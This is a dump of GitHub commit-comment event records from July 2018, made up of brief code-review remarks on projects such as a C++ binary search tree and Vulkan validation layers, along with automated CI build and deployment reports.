{"id":"7955177400","type":"CommitCommentEvent","actor":{"login":"chilijung"},"repo":{"name":"Canner/canner"},"payload":{"comment":{"id":29682780,"position":13,"line":50,"path":"package.json","commit_id":"78e28cc4151559a24a0e88e1cb6ec8e056cf6cbf","created_at":"2018-07-12T09:52:51Z","updated_at":"2018-07-12T09:52:51Z","author_association":"MEMBER","body":"??"}},"created_at":"2018-07-12T09:52:51Z"}
{"id":"7955180530","type":"CommitCommentEvent","actor":{"login":"dbajgoric"},"repo":{"name":"peterkohautarm/Vulkan-ValidationLayers"},"payload":{"comment":{"id":29682792,"position":60,"line":6808,"path":"layers/core_validation.cpp","commit_id":"a0392c31cef4ed4f04c130095c245cb831b9657e","created_at":"2018-07-12T09:53:27Z","updated_at":"2018-07-12T09:53:27Z","author_association":"NONE","body":"Is formatting messed up here?"}},"created_at":"2018-07-12T09:53:27Z"}
{"id":"7955187054","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29682805,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T09:54:38Z","updated_at":"2018-07-12T09:54:38Z","author_association":"OWNER","body":"@Awzaw i will try my best to make it work with the majority of the plugins, and I hope you accept it because the hard work I've put in this plugin"}},"created_at":"2018-07-12T09:54:38Z"}
{"id":"7955188890","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29682809,"position":4,"line":8,"path":"site/resources/views/home.blade.php","commit_id":"0c3ec5741638a39324435fd085a5fc41f98fe501","created_at":"2018-07-12T09:54:59Z","updated_at":"2018-07-12T09:54:59Z","author_association":"COLLABORATOR","body":"Alterar nome desse HyperLink** para 'Mostrar Perfil'"}},"created_at":"2018-07-12T09:54:59Z"}
{"id":"7955193944","type":"CommitCommentEvent","actor":{"login":"FrancescoConti"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29682819,"position":17,"line":17,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T09:55:54Z","updated_at":"2018-07-12T09:55:54Z","author_association":"MEMBER","body":"As I remember a preference for camel case in other projects, we could propose a camel-case based alternative style where we replace `lower_snake_case` with `lowerCamelCase` and we use `UpperCamelCase` for module declarations.\r\nThe two styles should be alternative and it should be clear which one is being used -- with slight preference for the snake case simply because it's the one being mostly used now.\r\n\r\nPS: after \"flaming\" with @accuminium a lot of time ago ( ;) ) I must admit I tried a project myself with CamelCase style. The result is not too bad, I have to admit."}},"created_at":"2018-07-12T09:55:54Z"}
{"id":"7955194744","type":"CommitCommentEvent","actor":{"login":"dbajgoric"},"repo":{"name":"peterkohautarm/Vulkan-ValidationLayers"},"payload":{"comment":{"id":29682824,"position":8,"line":991,"path":"layers/core_validation.cpp","commit_id":"a0392c31cef4ed4f04c130095c245cb831b9657e","created_at":"2018-07-12T09:56:02Z","updated_at":"2018-07-12T09:56:02Z","author_association":"NONE","body":"const auto & to avoid copy"}},"created_at":"2018-07-12T09:56:02Z"}
{"id":"7955207413","type":"CommitCommentEvent","actor":{"login":"schors"},"repo":{"name":"zfsonlinux/zfs-auto-snapshot"},"payload":{"comment":{"id":29682844,"position":null,"line":null,"path":null,"commit_id":"f145cf6e07c55f9544d562c5c7c4c8ba70a54a8e","created_at":"2018-07-12T09:58:24Z","updated_at":"2018-07-12T09:58:24Z","author_association":"NONE","body":"But why?"}},"created_at":"2018-07-12T09:58:24Z"}
{"id":"7955210968","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29682848,"position":null,"line":null,"path":null,"commit_id":"93625a226154438d5d3cca612dbe088264481e61","created_at":"2018-07-12T09:59:03Z","updated_at":"2018-07-12T09:59:03Z","author_association":"MEMBER","body":"@dutchman101 please action this. If we can find some middle ground where incompatible upgrades won't be listed but can be applied that would be good"}},"created_at":"2018-07-12T09:59:03Z"}
{"id":"7955214872","type":"CommitCommentEvent","actor":{"login":"KvanTTT"},"repo":{"name":"PositiveTechnologies/PT.PM"},"payload":{"comment":{"id":29682862,"position":5,"line":190,"path":"Sources/PT.PM.Common/TextUtils.cs","commit_id":"805db88fe5441c153fafaf5ad3f9c0cab7c47da3","created_at":"2018-07-12T09:59:47Z","updated_at":"2018-07-12T09:59:47Z","author_association":"MEMBER","body":"Not a very good solution, not cross-platform. It's better to use `NormDirSeparator` method. "}},"created_at":"2018-07-12T09:59:47Z"}
{"id":"7959323833","type":"CommitCommentEvent","actor":{"login":"FMassin"},"repo":{"name":"FMassin/py-NnK"},"payload":{"comment":{"id":29692872,"position":5,"line":25,"path":"scan/trigger.py","commit_id":"b926e4243bc6a31dd0c4fb0aa4d8aeee7e35b6e7","created_at":"2018-07-13T00:01:16Z","updated_at":"2018-07-13T00:01:16Z","author_association":"OWNER","body":"last panda version don't allow this"}},"created_at":"2018-07-13T00:01:16Z"}
{"id":"7959324186","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29692877,"position":null,"line":null,"path":null,"commit_id":"549c23e40fe7e5f6273acb472c34fc42e1f6a8b3","created_at":"2018-07-13T00:01:25Z","updated_at":"2018-07-13T00:01:25Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Exibir informações básicas para o administrador](https://trello.com/c/pNhYLjdk/212-exibir-informa%C3%A7%C3%B5es-b%C3%A1sicas-para-o-administrador)"}},"created_at":"2018-07-13T00:01:25Z"}
{"id":"7959325230","type":"CommitCommentEvent","actor":{"login":"FMassin"},"repo":{"name":"FMassin/py-NnK"},"payload":{"comment":{"id":29692881,"position":23,"line":272,"path":"scan/trigger.py","commit_id":"b926e4243bc6a31dd0c4fb0aa4d8aeee7e35b6e7","created_at":"2018-07-13T00:01:49Z","updated_at":"2018-07-13T00:01:49Z","author_association":"OWNER","body":"Being a bit more conservative"}},"created_at":"2018-07-13T00:01:49Z"}
{"id":"7959325588","type":"CommitCommentEvent","actor":{"login":"FMassin"},"repo":{"name":"FMassin/py-NnK"},"payload":{"comment":{"id":29692884,"position":42,"line":386,"path":"scan/trigger.py","commit_id":"b926e4243bc6a31dd0c4fb0aa4d8aeee7e35b6e7","created_at":"2018-07-13T00:01:58Z","updated_at":"2018-07-13T00:01:58Z","author_association":"OWNER","body":"Being a bit more conservative"}},"created_at":"2018-07-13T00:01:58Z"}
{"id":"7959325947","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692885,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-13T00:02:06Z","updated_at":"2018-07-13T00:02:06Z","author_association":"NONE","body":"issue_6802 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-13T00:02:06Z"}
{"id":"7959327448","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29692889,"position":null,"line":null,"path":null,"commit_id":"23e9c3bca7eb40566ffd4b6cd57b9b4e1f19ad30","created_at":"2018-07-13T00:02:41Z","updated_at":"2018-07-13T00:02:41Z","author_association":"CONTRIBUTOR","body":"> s that compulsory to have that 20ms delay?\r\n\r\n@sanu-krishnan yes it is.  The way socket events are currently implemented, events (like connect, or receive data) are only checked for during \"idle\" periods of the script.  A delay of 20ms will include an idle check.  To check for events more regularly would either decrease performance of scripts (eg by checking through a timer callback or every N iterations of the VM loop) or increase RAM usage (by creating a dedicated thread to check for events).\r\n\r\nIt seems like there is a bit of interest around making this work, so probably it should be fixed."}},"created_at":"2018-07-13T00:02:41Z"}
{"id":"7959327997","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29692891,"position":null,"line":null,"path":null,"commit_id":"690ef91196016a6a4163579607a1a0d58c9682c5","created_at":"2018-07-13T00:02:53Z","updated_at":"2018-07-13T00:02:53Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-713](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-713).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-713-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T00:02:53Z"}
{"id":"7959328878","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692894,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T00:03:17Z","updated_at":"2018-07-13T00:03:17Z","author_association":"NONE","body":"kiva-non-quad-walls (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T00:03:17Z"}
{"id":"7959328896","type":"CommitCommentEvent","actor":{"login":"FMassin"},"repo":{"name":"FMassin/py-NnK"},"payload":{"comment":{"id":29692895,"position":32,"line":307,"path":"scan/trigger.py","commit_id":"b926e4243bc6a31dd0c4fb0aa4d8aeee7e35b6e7","created_at":"2018-07-13T00:03:17Z","updated_at":"2018-07-13T00:03:17Z","author_association":"OWNER","body":"To be used only if signal is expected to be short and spiky"}},"created_at":"2018-07-13T00:03:17Z"}
{"id":"7959329544","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29692897,"position":null,"line":null,"path":null,"commit_id":"8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7","created_at":"2018-07-13T00:03:32Z","updated_at":"2018-07-13T00:03:32Z","author_association":"NONE","body":"issue_6802 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8bf8dbe9c3e2b13dc4c9ee5a07612d672b5c8fc7-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T00:03:32Z"}
{"id":"7959330152","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29692898,"position":null,"line":null,"path":null,"commit_id":"da7957d9cfe94910344d7307a06e7872c9e76953","created_at":"2018-07-13T00:03:48Z","updated_at":"2018-07-13T00:03:48Z","author_association":"CONTRIBUTOR","body":"@MartianLee 개인적으론 폴더도 어색하지만 위키도 어색해요."}},"created_at":"2018-07-13T00:03:48Z"}
{"id":"7959334879","type":"CommitCommentEvent","actor":{"login":"sypnl"},"repo":{"name":"JGCRI/gcamdata"},"payload":{"comment":{"id":29692910,"position":null,"line":null,"path":null,"commit_id":"81e12efca3a80525e0026be4c156e5c7f3e7de64","created_at":"2018-07-13T00:05:34Z","updated_at":"2018-07-13T00:05:34Z","author_association":"NONE","body":"Looks great Ryna! Could you add an additional comment? # TODO: need to create population_thous_province.csv and gdp_mil10usd_province.csv in R in version 1.1."}},"created_at":"2018-07-13T00:05:34Z"}
{"id":"7959337568","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29692913,"position":null,"line":null,"path":null,"commit_id":"2930586e06f90790de77b5fcf2e5b0f445e124e0","created_at":"2018-07-13T00:06:25Z","updated_at":"2018-07-13T00:06:25Z","author_association":"COLLABORATOR","body":"- New redesigned and improved overlay\r\n- RTC connection popout is finally properly themed!\r\n![image](https://user-images.githubusercontent.com/18150845/42663835-c11e82c8-8637-11e8-9fa9-693f9efe6b23.png)\r\n- New action type: `OVERLAY_NOTIFICATION_TIMEOUT`\r\n- New icons: `Drag`, `Copy`\r\n```js\r\nt.OverlayWidgets = {\r\n    GUILDS: null,\r\n    VOICE: null\r\n},\r\nt.OverlayNotificationTypes = {\r\n    INCOMING_CALL: null\r\n},\r\nt.OverlayNotificationStatuses = {\r\n    ACTIVE: null,\r\n    TIMED_OUT: null,\r\n    DISMISSED: null\r\n}\r\n```\r\n\r\n## New strings\r\n- `OVERLAY_LAUNCH_TITLE: \"Use Discord overlay in-game\"`\r\n- `OVERLAY_LAUNCH_OPEN_TIP: \"Press $[!!{keybind}!!](keybindHook) to show\"`\r\n- `OVERLAY_SETTINGS_TITLE: \"Overlay Settings\"`\r\n- `OVERLAY_NOTIFICATION_INCOMING_CALL: \"Incoming call...\"`\r\n- `INVITE_FRIENDS: \"Invite Friends\"`"}},"created_at":"2018-07-13T00:06:25Z"}
{"id":"7959345384","type":"CommitCommentEvent","actor":{"login":"BlackBeltPanda"},"repo":{"name":"BlackBeltPanda/Transport-Pipes"},"payload":{"comment":{"id":29692936,"position":null,"line":null,"path":null,"commit_id":"457b6a8496ec7696863c94df32663ea5644bab91","created_at":"2018-07-13T00:09:30Z","updated_at":"2018-07-13T00:09:30Z","author_association":"OWNER","body":"Why does GitHub do this to me? D="}},"created_at":"2018-07-13T00:09:30Z"}
{"id":"7959348455","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692943,"position":31,"line":31,"path":"BinarySearchTree/BST.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:10:37Z","updated_at":"2018-07-13T00:10:37Z","author_association":"NONE","body":"Memory leaks are still a problem, you should have a destructor that deletes all the nodes in your tree."}},"created_at":"2018-07-13T00:10:37Z"}
{"id":"7959352008","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692951,"position":52,"line":50,"path":"BinarySearchTree/BST.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:11:58Z","updated_at":"2018-07-13T00:11:58Z","author_association":"NONE","body":"This code is copied too many times, you should have a function that does this for you."}},"created_at":"2018-07-13T00:11:58Z"}
{"id":"7959352934","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692955,"position":55,"line":53,"path":"BinarySearchTree/BST.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:12:22Z","updated_at":"2018-07-13T00:12:22Z","author_association":"NONE","body":"This block of code is copied too many times, you should have a function that does this for you."}},"created_at":"2018-07-13T00:12:22Z"}
{"id":"7959353140","type":"CommitCommentEvent","actor":{"login":"sh501st"},"repo":{"name":"dwdv/Lagerverwaltungssystem"},"payload":{"comment":{"id":29692957,"position":null,"line":null,"path":null,"commit_id":"f92e33fd6ecb2d677934ee5f70472eba6c31a4f3","created_at":"2018-07-13T00:12:26Z","updated_at":"2018-07-13T00:12:26Z","author_association":"COLLABORATOR","body":"sry, about tab indents.... :/"}},"created_at":"2018-07-13T00:12:26Z"}
{"id":"7959356182","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692963,"position":9,"line":23,"path":"BinarySearchTree/BST.h","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:13:40Z","updated_at":"2018-07-13T00:13:40Z","author_association":"NONE","body":"The namespacing here shouldn't be necessary, you are inside the BST class."}},"created_at":"2018-07-13T00:13:40Z"}
{"id":"7959357490","type":"CommitCommentEvent","actor":{"login":"BridgeAR"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29692966,"position":5,"line":1694,"path":"doc/api/process.md","commit_id":"445ca1b3cc15d01d42e80380c72c0a6954094342","created_at":"2018-07-13T00:14:13Z","updated_at":"2018-07-13T00:14:13Z","author_association":"MEMBER","body":"It seems like a string is also accepted."}},"created_at":"2018-07-13T00:14:13Z"}
{"id":"7959359866","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692973,"position":11,"line":25,"path":"BinarySearchTree/BST.h","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:15:12Z","updated_at":"2018-07-13T00:15:12Z","author_association":"NONE","body":"You can have PrintTree just print from the root rather than expose the root via this getter.  The user of this class shouldn't really have access to the root, it defeats the purpose of it being a private member of the class."}},"created_at":"2018-07-13T00:15:12Z"}
{"id":"7959362264","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692983,"position":5,"line":12,"path":"BinarySearchTree/BST.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:16:08Z","updated_at":"2018-07-13T00:16:08Z","author_association":"NONE","body":"You can use nullptr instead of NULL, it's a newer C++ feature that is a little more safe."}},"created_at":"2018-07-13T00:16:08Z"}
{"id":"7959365255","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692990,"position":129,"line":96,"path":"BinarySearchTree/BST.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:17:26Z","updated_at":"2018-07-13T00:17:26Z","author_association":"NONE","body":"Nitpick, but these are a lot more readable with spacing between the operators:\r\n\r\n+    if(key == root->Key)\r\n\r\n+    if(key < root->Key)"}},"created_at":"2018-07-13T00:17:26Z"}
{"id":"7959367983","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"dataitgirls2/TWL"},"payload":{"comment":{"id":29692998,"position":null,"line":null,"path":null,"commit_id":"8a0b6a5799c345566094dda7f9f0c90926608990","created_at":"2018-07-13T00:18:36Z","updated_at":"2018-07-13T00:18:36Z","author_association":"CONTRIBUTOR","body":"앗! 컨플릭 파일만 삭제했어야했는데 폴더를 삭제해 주셨네요. 컨플릭 외 파일은 다시 복구해야 될거 같아요."}},"created_at":"2018-07-13T00:18:36Z"}
{"id":"7959368235","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29692999,"position":6,"line":16,"path":"BinarySearchTree/Source.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:18:44Z","updated_at":"2018-07-13T00:18:44Z","author_association":"NONE","body":"You don't need to call the constructor manually here.  It is automatically called for you if you just do:\r\n\r\n`BST BS_Tree;`\r\n\r\nThis only works if it's not a pointer."}},"created_at":"2018-07-13T00:18:44Z"}
{"id":"7959369191","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29693002,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-13T00:19:09Z","updated_at":"2018-07-13T00:19:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T00:19:09Z"}
{"id":"7959369522","type":"CommitCommentEvent","actor":{"login":"isaacl"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29693003,"position":null,"line":null,"path":null,"commit_id":"26e3e9085a82c17c60502b2914c37ae14a41d533","created_at":"2018-07-13T00:19:16Z","updated_at":"2018-07-13T00:19:16Z","author_association":"CONTRIBUTOR","body":"was there a review for this commit?  Looks like an unnecessary rename which causes merge conflicts in my changes, plus breaking serialization?"}},"created_at":"2018-07-13T00:19:16Z"}
{"id":"7959369581","type":"CommitCommentEvent","actor":{"login":"dhirendra31pandit"},"repo":{"name":"virtualidentityag/summerschool2018"},"payload":{"comment":{"id":29693004,"position":null,"line":null,"path":null,"commit_id":"9ad1f771905c0f724bc63cebe9dfb337e5a528b5","created_at":"2018-07-13T00:19:18Z","updated_at":"2018-07-13T00:19:18Z","author_association":"NONE","body":"First Page"}},"created_at":"2018-07-13T00:19:18Z"}
{"id":"7959376148","type":"CommitCommentEvent","actor":{"login":"dgutierrez-tinyco"},"repo":{"name":"Yedya/BST"},"payload":{"comment":{"id":29693022,"position":11,"line":21,"path":"BinarySearchTree/Source.cpp","commit_id":"4156b186ca4224d9e5d3190eba08a812d8118525","created_at":"2018-07-13T00:22:03Z","updated_at":"2018-07-13T00:22:03Z","author_association":"NONE","body":"I don't love the fact that the user has to call \"newNode\" instead of Insert now.  \"Insert\" on a BST gives the user more information about what the function does, since this is a common operation on a tree.  newNode can mean anything.  If you need to you can have a public \"Insert\" that takes a key and an internal \"_Insert\" that is recursive and takes both a node and key."}},"created_at":"2018-07-13T00:22:03Z"}
{"id":"7959376770","type":"CommitCommentEvent","actor":{"login":"vascosrvbr"},"repo":{"name":"StevenBlack/hosts"},"payload":{"comment":{"id":29693023,"position":null,"line":null,"path":null,"commit_id":"8a1a4ad77faa001786f2b3434b0307d5acdd93c7","created_at":"2018-07-13T00:22:18Z","updated_at":"2018-07-13T00:22:18Z","author_association":"NONE","body":"true :|"}},"created_at":"2018-07-13T00:22:18Z"}
{"id":"7959377506","type":"CommitCommentEvent","actor":{"login":"acastillo2015"},"repo":{"name":"acastillo2015/startboot"},"payload":{"comment":{"id":29693024,"position":null,"line":null,"path":null,"commit_id":"135d3336f6e8943ec7328cb4767c78d28ac489e5","created_at":"2018-07-13T00:22:35Z","updated_at":"2018-07-13T00:22:35Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ff7de397-6a87-4d10-ac2d-fda53e8af73f?env_id=ibm%3Ayp%3Aus-south \"Meetup1207\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3d1e337d-13d6-4e1c-a017-ffe9b87173d7?env_id=ibm%3Ayp%3Aus-south \"Meetup deploy\") deployed [startboot](https://github.com/acastillo2015/startboot/releases/tag/deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180713-002234 \"deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180713-002234\") to [Meetup Chile](https://console.bluemix.net/apps/aac93772-8cc5-4454-85f0-036f5e9d807f?env_id=ibm:yp:us-south \"ibm:yp:us-south:acastillo@cl.ibm.com:Meetup Chile\"), including this commit"}},"created_at":"2018-07-13T00:22:35Z"}
{"id":"7959380853","type":"CommitCommentEvent","actor":{"login":"sriadiga"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693030,"position":42,"line":42,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T00:23:55Z","updated_at":"2018-07-13T00:23:55Z","author_association":"NONE","body":"Indentation seems off here."}},"created_at":"2018-07-13T00:23:55Z"}
{"id":"7959393657","type":"CommitCommentEvent","actor":{"login":"e-corp-sam-sepiol"},"repo":{"name":"e-corp-sam-sepiol/vertnode"},"payload":{"comment":{"id":29693066,"position":null,"line":null,"path":null,"commit_id":"a4d263134227d2925f11a98f6a299e2a1cf75ef3","created_at":"2018-07-13T00:29:01Z","updated_at":"2018-07-13T00:29:01Z","author_association":"OWNER","body":"Thanks @Xer0 for testing and bringing this bug to my attention"}},"created_at":"2018-07-13T00:29:01Z"}
{"id":"7959393663","type":"CommitCommentEvent","actor":{"login":"tomholub"},"repo":{"name":"FlowCrypt/flowcrypt-browser"},"payload":{"comment":{"id":29693067,"position":null,"line":null,"path":null,"commit_id":"60ff34aa9e507159fce9aaca64289225e0c08671","created_at":"2018-07-13T00:29:01Z","updated_at":"2018-07-13T00:29:01Z","author_association":"COLLABORATOR","body":"#1156"}},"created_at":"2018-07-13T00:29:01Z"}
{"id":"7959393822","type":"CommitCommentEvent","actor":{"login":"tomholub"},"repo":{"name":"FlowCrypt/flowcrypt-browser"},"payload":{"comment":{"id":29693068,"position":null,"line":null,"path":null,"commit_id":"3802b1ffa4676c61691ce109b8b1145d912020e3","created_at":"2018-07-13T00:29:07Z","updated_at":"2018-07-13T00:29:07Z","author_association":"COLLABORATOR","body":"#1156"}},"created_at":"2018-07-13T00:29:07Z"}
{"id":"7959394176","type":"CommitCommentEvent","actor":{"login":"tomholub"},"repo":{"name":"FlowCrypt/flowcrypt-browser"},"payload":{"comment":{"id":29693070,"position":null,"line":null,"path":null,"commit_id":"f089d0f97eab8c21e7cab971bd9c613e0842e264","created_at":"2018-07-13T00:29:15Z","updated_at":"2018-07-13T00:29:15Z","author_association":"COLLABORATOR","body":"#1156"}},"created_at":"2018-07-13T00:29:15Z"}
{"id":"7959394446","type":"CommitCommentEvent","actor":{"login":"tomholub"},"repo":{"name":"FlowCrypt/flowcrypt-browser"},"payload":{"comment":{"id":29693071,"position":null,"line":null,"path":null,"commit_id":"8923118e10f547117660360893dc340ec1c439b7","created_at":"2018-07-13T00:29:22Z","updated_at":"2018-07-13T00:29:22Z","author_association":"COLLABORATOR","body":"#1156"}},"created_at":"2018-07-13T00:29:22Z"}
{"id":"7959395889","type":"CommitCommentEvent","actor":{"login":"frostygoth"},"repo":{"name":"frostygoth/Hello-World"},"payload":{"comment":{"id":29693074,"position":null,"line":null,"path":null,"commit_id":"5c16dadde2aae8c54fd60a11abab6240422157c1","created_at":"2018-07-13T00:29:59Z","updated_at":"2018-07-13T00:29:59Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-13T00:29:59Z"}
{"id":"7959399796","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693082,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-13T00:31:30Z","updated_at":"2018-07-13T00:31:30Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2112 of 2972 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nDataSetFixture Test Summary\n * Passed: 37\n * Failed: 2\n\nEnergyPlusFixture Test Summary\n * Passed: 448\n * Failed: 197\n\nInputProcessorFixture Test Summary\n * Passed: 40\n * Failed: 9\n\nintegration Test Summary\n * Passed: 2\n * Failed: 626\n\nSQLiteFixture Test Summary\n * Passed: 65\n * Failed: 3\n\nZoneUnitarySystemTest Test Summary\n * Passed: 3\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-71.06%25-red.png)</a> \n"}},"created_at":"2018-07-13T00:31:30Z"}
